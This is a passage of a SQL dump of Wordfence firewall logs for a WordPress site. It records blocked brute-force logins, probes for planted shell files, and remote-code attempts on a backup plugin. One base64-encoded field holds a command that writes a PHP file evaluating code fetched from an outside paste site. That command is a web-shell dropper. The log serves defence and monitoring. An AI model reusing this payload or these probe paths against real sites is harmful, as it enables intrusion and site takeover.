User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzLmFwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14207,0.000000,1704500799.860882,'\0\0\0\0\0\0\0\0\0\0k^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14208,1704500804.398324,1704500804.333800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vdXBsb2Fkcy93cC1kZmtsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(15737,0.000000,1705044528.683215,'\0\0\0\0\0\0\0\0\0\0E',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15738,0.000000,1705047605.295665,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15736,0.000000,1705044471.195476,'\0\0\0\0\0\0\0\0\0\0g',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15739,0.000000,1705047735.660475,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15740,0.000000,1705047800.111006,'\0\0\0\0\0\0\0\0\0\0]',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15741,0.000000,1705048121.841260,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15742,0.000000,1705049798.800962,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15743,0.000000,1705051046.960004,'\0\0\0\0\0\0\0\0\0\03k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15744,0.000000,1705051114.951832,'\0\0\0\0\0\0\0\0\0\0$',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15745,0.000000,1705053953.492708,'\0\0\0\0\0\0\0\0\0\0C',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15746,0.000000,1705054391.571113,'\0\0\0\0\0\0\0\0\0\0gm',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15747,0.000000,1705054451.791252,'\0\0\0\0\0\0\0\0\0\0c',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15748,0.000000,1705056313.945709,'\0\0\0\0\0\0\0\0\0\0`',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15749,0.000000,1705056382.781209,'\0\0\0\0\0\0\0\0\0\0Y\'m',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15750,1705056677.686401,1705056677.598700,'\0\0\0\0\0\0\0\0\0\0[\\j',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15751,0.000000,1705057606.024046,'\0\0\0\0\0\0\0\0\0\0D4$',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15720,0.000000,1705031416.065171,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15721,0.000000,1705031483.047145,'\0\0\0\0\0\0\0\0\0\0m<',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15722,0.000000,1705031869.346843,'\0\0\0\0\0\0\0\0\0\09',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15723,0.000000,1705033115.461915,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15724,0.000000,1705034497.737217,'\0\0\0\0\0\0\0\0\0\0\0x',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15725,0.000000,1705034689.106789,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15726,0.000000,1705034755.852911,' A.\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15729,0.000000,1705039683.929000,'\0\0\0\0\0\0\0\0\0\0:',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15719,1705029351.718931,1705029351.615300,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/g4.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2c0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15727,0.000000,1705037970.723505,'\0\0\0\0\0\0\0\0\0\0]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15728,0.000000,1705038038.117269,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15717,0.000000,1705029319.459002,'\0\0\0\0\0\0\0\0\0\0\\',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0','loginFailInvalidUsername',NULL,NULL),(15718,1705029357.085368,1705029357.018400,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/Gel4y.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0dlbDR5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15730,1705040173.022253,1705040172.952900,'\0\0\0\0\0\0\0\0\0\0:',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(15731,1705039895.200351,1705039895.123600,'\0\0\0\0\0\0\0\0\0\0. ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'python-requests/2.25.1','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15716,1705029082.941520,1705029082.876200,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/.well-known/acme-challenge/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlL3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15715,1705029086.009424,1705029085.949400,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/network/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsveG1ybHBjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15735,1705042299.705891,1705042299.622300,'\0\0\0\0\0\0\0\0\0\0&\r}',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'python-requests/2.28.1','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15714,1705029087.687816,1705029087.637400,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15713,1705029090.693336,1705029090.642700,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/cgi-bin/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4veG1ybHBjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15712,1705029094.523989,1705029094.456200,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/css/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15711,1705029099.024404,1705029098.960600,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/user/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIveG1ybHBjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15710,1705029102.125938,1705029102.078700,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/img/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltZy94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15709,1705029108.475967,1705029108.405200,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/css/colors/coffee/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15708,1705029110.604931,1705029110.550600,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/images/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15707,1705029113.156877,1705029113.104500,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/images/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15706,1705029116.326231,1705029116.277200,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/js/widgets/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMveG1ybHBjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15705,1705029118.743288,1705029118.678300,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/css/colors/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMveG1ybHBjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15704,1705029121.833205,1705029121.758800,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/includes/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 